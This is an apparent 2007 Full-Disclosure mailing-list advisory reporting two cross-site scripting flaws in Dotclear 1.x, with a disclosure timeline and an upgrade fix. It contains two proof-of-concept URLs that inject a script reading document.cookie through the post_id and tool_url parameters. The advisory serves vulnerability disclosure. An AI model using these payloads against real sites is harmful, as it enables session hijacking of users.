Dotclear 1.* Cross Site Scripting Vulnerability

["nssimo nssimo" <nsimou () gmail com>]

Dotclear 1.*  Cross Site Scripting Vulnerability


1--two cross site scripting vulnerabilities have been discovered in the
dotclear1.*  allowing a remote  attackers to hijack authenticated session
Workaround:
$post_id (trackback.php)
$tool_url(/tools/thememng/index.php)
are not filtered
2-Proof of Concepts:
dotclear/ecrire/trackback.php?post_id="><script>alert(document.cookie
);</script>

/ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng


3-Disclosure timeline
05/04/2007   dotclear team contacted
10/04/2007  fixed

4-solution:
upgrade to dotclear 1.2.6
http://www.dotclear.net/

found by nassim
http://www.securlabs.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/